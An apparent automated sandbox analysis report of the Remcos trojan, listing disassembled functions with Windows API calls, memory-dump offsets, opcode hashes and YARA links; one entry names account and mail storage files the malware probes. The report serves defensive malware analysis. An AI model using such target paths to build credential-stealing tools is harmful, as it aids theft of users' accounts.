                                                                                                                                                                                    • Opcode ID: d28ee4da656b645b80f9473e249449b013ec97549b77f7daa5b718e7bd64bc74
                                                                                                                                                                                    • Instruction ID: ddff71f0b4f7f33ca8d0b7b674e25a40f026fa00292a2160c244e587a4f78f1f
                                                                                                                                                                                    • Opcode Fuzzy Hash: d28ee4da656b645b80f9473e249449b013ec97549b77f7daa5b718e7bd64bc74
                                                                                                                                                                                    • Instruction Fuzzy Hash: FB212CB294222CAFDB119BA08C8CFEE76FCEB18755F010566F612E2240DA749E458A74
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE99492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetConsoleCP.KERNEL32 ref: 2DE994D4
                                                                                                                                                                                    • __fassign.LIBCMT ref: 2DE9954F
                                                                                                                                                                                    • __fassign.LIBCMT ref: 2DE9956A
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 2DE99590
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,2DE99C07,00000000), ref: 2DE995AF
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,2DE99C07,00000000), ref: 2DE995E8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                    • Opcode ID: 407ddc1a9133931e4bdf8536315f4cf8e46064fd7f18d5e606d32cf9203adee0
                                                                                                                                                                                    • Instruction ID: 5d13a661c73cd06babf98365168d2816ccd8af164d26289c1b93eabd2e82133d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 407ddc1a9133931e4bdf8536315f4cf8e46064fd7f18d5e606d32cf9203adee0
                                                                                                                                                                                    • Instruction Fuzzy Hash: F651A271901209AFCB00CFA4CC95BEEBBF9FF19710F14515AE955F7282DA30A941CBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE93370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 2DE9339B
                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 2DE933A3
                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 2DE93431
                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 2DE9345C
                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 2DE934B1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                    • Opcode ID: e411eb355a93a71277c8441535c4eec0f2e6bb9bcbc772d36b1ae389e15711c8
                                                                                                                                                                                    • Instruction ID: 3654599102ba48f11f9dc4e365c59744aa43f3b4619cfbe91d77d5ba61111f83
                                                                                                                                                                                    • Opcode Fuzzy Hash: e411eb355a93a71277c8441535c4eec0f2e6bb9bcbc772d36b1ae389e15711c8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7141E734A06218ABCF01CF68C884AEEBBF5FF45228F118155EA55BB352DF35DA11CB90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE9925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 2DE99221: _free.LIBCMT ref: 2DE9924A
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE992AB
                                                                                                                                                                                      • Part of subcall function 2DE9571E: HeapFree.KERNEL32(00000000,00000000), ref: 2DE95734
                                                                                                                                                                                      • Part of subcall function 2DE9571E: GetLastError.KERNEL32(?,?,2DE9924F,?,00000000,?,00000000,?,2DE99276,?,00000007,?,?,2DE97E5A,?,?), ref: 2DE95746
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE992B6
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE992C1
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE99315
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE99320
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE9932B
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE99336
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                    • Instruction ID: 237eaac65050e706cba1f7d12a66e0fc3e61b0fca0475dfc9c6fb6ee2f1d2aa6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                    • Instruction Fuzzy Hash: D9118E3154AB08FADA20ABB0FC45FCF7B9DEF24700F410824B799B6092DE24B6448761
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE915DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _strlen.LIBCMT ref: 2DE91607
                                                                                                                                                                                    • _strcat.LIBCMT ref: 2DE9161D
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2DE9190E,?,?,00000000,?,00000000), ref: 2DE91643
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 2DE9165A
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,2DE9190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 2DE91661
                                                                                                                                                                                    • lstrcatW.KERNEL32(00001008,?), ref: 2DE91686
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1922816806-0
                                                                                                                                                                                    • Opcode ID: 4dc3014577440d77c2940331250495bfa33f737681f03ab7184b22758ad52b47
                                                                                                                                                                                    • Instruction ID: 8c7d66418def2e6f1d22d99fcce653e37748719a6d7a29403d63b3b04b164b55
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4dc3014577440d77c2940331250495bfa33f737681f03ab7184b22758ad52b47
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D219536905208ABDB059B64DC84EFE77B9EF88724F24441BE604FB281DF34A54687A9
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE91000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 2DE91038
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2DE9104B
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2DE91061
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 2DE91075
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 2DE91090
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 2DE910B8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3594823470-0
                                                                                                                                                                                    • Opcode ID: 798db21d0edf82a9c54e9823d4c9faf1451cf5b259ca60febf2cd0661ec2cef8
                                                                                                                                                                                    • Instruction ID: 63b489895e1cebf52e001deb5408453ac62a5fba8a997e8adeee52500ddd9c48
                                                                                                                                                                                    • Opcode Fuzzy Hash: 798db21d0edf82a9c54e9823d4c9faf1451cf5b259ca60febf2cd0661ec2cef8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9421627690132CABCF10DB64DC48EEF3779EF44218F104296E959B71A1DE319A95CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE93856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,2DE93518,2DE923F1,2DE91F17), ref: 2DE93864
                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 2DE93872
                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2DE9388B
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,2DE93518,2DE923F1,2DE91F17), ref: 2DE938DD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                    • Opcode ID: 7d886d71935c931cbdcbdfefe8b09dba41ea3cabca5f9d60e53956b785a076cc
                                                                                                                                                                                    • Instruction ID: f31d33fecb4aafce24118a3d1cd8b232e8d978199e111ef805b0bb7758616bca
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d886d71935c931cbdcbdfefe8b09dba41ea3cabca5f9d60e53956b785a076cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D01D87360F7226DE22115F96CC8ADA67E6DB15A7DF21022AE3A0B71D1FF1588018348
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE95AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,2DE96C6C), ref: 2DE95AFA
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95B2D
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95B55
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,2DE96C6C), ref: 2DE95B62
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,2DE96C6C), ref: 2DE95B6E
                                                                                                                                                                                    • _abort.LIBCMT ref: 2DE95B74
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                    • Opcode ID: 87de57c01c3e3865e7123854e7eb2dbcaf56f4d6861a6def4101814682e1750a
                                                                                                                                                                                    • Instruction ID: ba5d52bc7d16ed37e5671e3cb82482c90ed94b0afc6b4cc58a0b3c7eb763a0d9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 87de57c01c3e3865e7123854e7eb2dbcaf56f4d6861a6def4101814682e1750a
                                                                                                                                                                                    • Instruction Fuzzy Hash: AFF0C8B350F911AAC20357346C45FEE26BADFE1979F260126FA16B6281FE2589024178
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE911EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 2DE91E89: lstrlenW.KERNEL32(?,?,?,?,?,2DE910DF,?,?,?,00000000), ref: 2DE91E9A
                                                                                                                                                                                      • Part of subcall function 2DE91E89: lstrcatW.KERNEL32(?,?), ref: 2DE91EAC
                                                                                                                                                                                      • Part of subcall function 2DE91E89: lstrlenW.KERNEL32(?,?,2DE910DF,?,?,?,00000000), ref: 2DE91EB3
                                                                                                                                                                                      • Part of subcall function 2DE91E89: lstrlenW.KERNEL32(?,?,2DE910DF,?,?,?,00000000), ref: 2DE91EC8
                                                                                                                                                                                      • Part of subcall function 2DE91E89: lstrcatW.KERNEL32(?,2DE910DF), ref: 2DE91ED3
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2DE9122A
                                                                                                                                                                                      • Part of subcall function 2DE9173A: _strlen.LIBCMT ref: 2DE91855
                                                                                                                                                                                      • Part of subcall function 2DE9173A: _strlen.LIBCMT ref: 2DE91869
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                    • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                    • API String ID: 4036392271-1520055953
                                                                                                                                                                                    • Opcode ID: 75e39cd7a822509c3f6c96b7e8d60eec0ece6744b614ece740c94672a164daec
                                                                                                                                                                                    • Instruction ID: 3e0db8621412df2cd767585444c7467ef584b7488a1c8f211cc54eaaf0a8b302
                                                                                                                                                                                    • Opcode Fuzzy Hash: 75e39cd7a822509c3f6c96b7e8d60eec0ece6744b614ece740c94672a164daec
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE21A279E15218AAEB1097A0EC81FFE7339EF90718F000556F705FB2E1EAB15E818759
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE94B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,2DE94AEA,?,?,2DE94A8A,?,2DEA2238,0000000C,2DE94BBD,00000000,00000000), ref: 2DE94B59
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,2DE94AEA,?,?,2DE94A8A,?,2DEA2238,0000000C,2DE94BBD,00000000,00000000), ref: 2DE94B6C
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,2DE94AEA,?,?,2DE94A8A,?,2DEA2238,0000000C,2DE94BBD,00000000,00000000,00000001,2DE92082), ref: 2DE94B8F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                    • Opcode ID: 1ca8b7cf641407626cc8f4d3a2d976a7982f54c9f4dc462b10eb6b6665e805d4
                                                                                                                                                                                    • Instruction ID: e4a59f5463cda024a0766a829c5fe5f0471695034de9c98a6a2f7b64c0741da1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ca8b7cf641407626cc8f4d3a2d976a7982f54c9f4dc462b10eb6b6665e805d4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF0C872902128BFCB019F90C808FED7FF9EF04769F004155F906B2250EF34A951CA54
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE97153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 2DE9715C
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2DE9717F
                                                                                                                                                                                      • Part of subcall function 2DE956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 2DE95702
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 2DE971A5
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE971B8
                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 2DE971C7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                                    • Opcode ID: c13fc82b6fc05fd9c55394bbfdddd0c26bb4c271537b0d3c9beee5a2772c9ba2
                                                                                                                                                                                    • Instruction ID: 48e10245781ea2f26d42374a408e0f3b748c9829c4cc4f3463696e69cf4de524
                                                                                                                                                                                    • Opcode Fuzzy Hash: c13fc82b6fc05fd9c55394bbfdddd0c26bb4c271537b0d3c9beee5a2772c9ba2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7501D8736072257BA7122AB74C89EFF2E6EEBC2DA4715052ABE04F7204DE649C0581B4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE95B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,2DE9636D,2DE95713,00000000,?,2DE92249,?,?,2DE91D66,00000000,?,?,00000000), ref: 2DE95B7F
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95BB4
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95BDB
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 2DE95BE8
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 2DE95BF1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                    • Opcode ID: 6dbe912160d33d86a76c4613cacb28fee552bd72e0ffaece3e7cc09859c7e914
                                                                                                                                                                                    • Instruction ID: 558d29a66aaa0309b7df9b76ffde9b1a2ad2c75272baf56fe853731ebf32dafa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dbe912160d33d86a76c4613cacb28fee552bd72e0ffaece3e7cc09859c7e914
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3101A9B710B611A7D20366745C84EEF26BADBD19BCB110115FE17B6241FE65D9024164
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE91E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,2DE910DF,?,?,?,00000000), ref: 2DE91E9A
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 2DE91EAC
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,2DE910DF,?,?,?,00000000), ref: 2DE91EB3
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,2DE910DF,?,?,?,00000000), ref: 2DE91EC8
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,2DE910DF), ref: 2DE91ED3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$lstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 493641738-0
                                                                                                                                                                                    • Opcode ID: 0328af68a78d8faab7220c98c63320917bdaa007d57d80e470faac1edd9244cd
                                                                                                                                                                                    • Instruction ID: 3c6a8de4469880ddc2bb0a03a3db9ed1ccb70672e8e7589bfd32b8a542cb8dfa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0328af68a78d8faab7220c98c63320917bdaa007d57d80e470faac1edd9244cd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 86F089675022247AD7212719EC85FFF777DEFC5A60F04401AF60DA3290DB54685292B9
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE991B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE991D0
                                                                                                                                                                                      • Part of subcall function 2DE9571E: HeapFree.KERNEL32(00000000,00000000), ref: 2DE95734
                                                                                                                                                                                      • Part of subcall function 2DE9571E: GetLastError.KERNEL32(?,?,2DE9924F,?,00000000,?,00000000,?,2DE99276,?,00000007,?,?,2DE97E5A,?,?), ref: 2DE95746
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE991E2
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE991F4
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE99206
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE99218
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 5a1772e3573a8027de6c2c22d0f703ef8495a04e6be62ec02b0a62bc5762d3bf
                                                                                                                                                                                    • Instruction ID: 43b5551d6b7448ed945590e80bc050e6860025dad9cf09989e0310b7a7e1dd0b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a1772e3573a8027de6c2c22d0f703ef8495a04e6be62ec02b0a62bc5762d3bf
                                                                                                                                                                                    • Instruction Fuzzy Hash: EBF0627251E24097C610DB95E9C5CA7BBEAFB34714B521805FA4AF7600CF34F8808B74
